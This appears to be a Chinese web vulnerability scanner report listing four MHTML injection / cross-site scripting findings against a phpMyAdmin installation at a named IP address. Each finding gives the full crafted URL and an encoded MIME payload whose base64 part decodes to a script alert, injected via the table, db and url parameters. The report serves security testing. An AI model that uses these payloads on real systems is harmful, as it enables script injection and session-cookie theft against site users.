
URL | http://202.201.39.48/phpmyadmin/index.php?lang=zh_CN&table=atestu&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu |
---|---|
请求方式 | GET |
问题参数 | table |
判断标准 |
1、修改指定参数值为触发mhtml漏洞的特殊字符串,发送请求; 2、如果浏览器能够执行注入代码,则认为存在该漏洞。 |
判断详情 |
1、构造URL:
http://202.201.39.48/phpmyadmin/index.php?lang=zh_CN&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu&table=atestu----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie
;
2、设置参数 table 为 ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie ; 3、在响应头及响应内容中匹配: ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie 。 |
请求&响应 |
![]() |
URL | http://202.201.39.48/phpmyadmin/index.php?lang=zh_CN&table=atestu&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu |
---|---|
请求方式 | GET |
问题参数 | db |
判断标准 |
1、修改指定参数值为触发mhtml漏洞的特殊字符串,发送请求; 2、如果浏览器能够执行注入代码,则认为存在该漏洞。 |
判断详情 |
1、构造URL:
http://202.201.39.48/phpmyadmin/index.php?lang=zh_CN&table=atestu&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie
;
2、设置参数 db 为 ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie ; 3、在响应头及响应内容中匹配: ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie 。 |
请求&响应 |
![]() |
URL | http://202.201.39.48/phpmyadmin/url.php?url=https://www.phpmyadmin.net/&lang=zh_CN&token=5137e026c7ba9f6adc23fe631d612ace |
---|---|
请求方式 | GET |
问题参数 | url |
判断标准 |
1、修改指定参数值为触发mhtml漏洞的特殊字符串,发送请求; 2、如果浏览器能够执行注入代码,则认为存在该漏洞。 |
判断详情 |
1、构造URL:
http://202.201.39.48/phpmyadmin/url.php?lang=zh_CN&token=5137e026c7ba9f6adc23fe631d612ace&url=https://www.phpmyadmin.net/----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie
;
2、设置参数 url 为 ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie ; 3、在响应头及响应内容中匹配: ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie 。 |
请求&响应 |
![]() |
URL | http://202.201.39.48/phpmyadmin/url.php?url=https://www.phpmyadmin.net/&token=7f6f76c93661b81b29cd7457ecae1b45 |
---|---|
请求方式 | GET |
问题参数 | url |
判断标准 |
1、修改指定参数值为触发mhtml漏洞的特殊字符串,发送请求; 2、如果浏览器能够执行注入代码,则认为存在该漏洞。 |
判断详情 |
1、构造URL:
http://202.201.39.48/phpmyadmin/url.php?token=7f6f76c93661b81b29cd7457ecae1b45&url=https://www.phpmyadmin.net/----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie
;
2、设置参数 url 为 ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie ; 3、在响应头及响应内容中匹配: ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie 。 |
请求&响应 |
![]() |